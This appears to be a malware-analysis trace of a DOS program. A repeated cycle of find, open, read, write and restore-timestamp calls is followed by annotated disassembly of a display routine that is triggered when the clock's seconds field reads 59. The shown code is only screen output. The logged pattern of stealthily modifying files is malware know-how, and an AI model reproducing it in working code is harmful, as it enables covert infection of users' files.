2018-12-25T12:40:45.675545593Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.679152146Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.680785805Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.689674416Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.704633074Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.707260238Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.71784476Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.725850586Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.732711624Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.733958343Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.73761548Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.739610429Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.74273849Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.753234731Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.755133952Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.763005046Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.774672751Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.777337165Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.787679036Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.795425579Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.802253875Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.80362577Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.806727797Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.808149186Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.81048809Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.813809811Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.815583616Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.822783175Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.833046384Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.835636501Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.841930848Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.846419263Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.8507379Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.85171756Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.853494353Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.860785948Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.863544704Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.870389087Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.872144568Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.88001799Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.890363026Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.893441536Z 59 PC: 12a75 | Change current directory
2018-12-25T12:40:45.898532839Z 59 PC: 12b26 | Change current directory
; Excerpt 0x12b3c-0x12b62: screen output that runs only when the clock's seconds field is 59.
; Only a BIOS video call (int 10h) is visible in this window; the excerpt ends inside the display code.
; The page's run records carry "Second":0 or "Second":59; 59 is the value tested here.
2018-12-25T12:40:45.900355436Z 44 PC: 12b3c | Get time 0x12b3c: cmp dh, 0x3b ; DH = seconds returned by Get time; compare with 59
0x12b3f: jne 0x12b6b ; any other second: skip to 0x12b6b (not shown)
0x12b41: mov bh, 0 ; int 10h AH=13h argument: video page 0
0x12b43: mov cx, 0xf00 ; pushed below and popped after the call; looks like an outer loop counter - loop end not shown
0x12b46: mov dh, 0xc ; row 12
0x12b48: mov dl, 5 ; column 5
0x12b4a: mov bl, 1 ; character attribute (colour) 1
0x12b4c: push cx ; keep CX while it is reused for the delay and the string length
0x12b4d: mov cx, 0x100 ; 256 iterations
0x12b50: push ax ; push/pop pair leaves AX unchanged: a short busy-wait
0x12b51: pop ax
0x12b52: loop 0x12b50
0x12b54: push bp ; BP is restored after the call
0x12b55: add bp, 0x25f ; BP -> string 0x25f past the base held in BP (ES is not set in this excerpt)
0x12b59: mov cx, 0x2d ; string length = 45 characters
0x12b5c: mov ah, 0x13 ; int 10h AH=13h: write string; AL (write mode) is not set in this excerpt
0x12b5e: int 0x10
0x12b60: pop bp
0x12b61: pop cx
0x12b62: inc bl ; next attribute value - presumably colour cycling on the following pass; excerpt ends here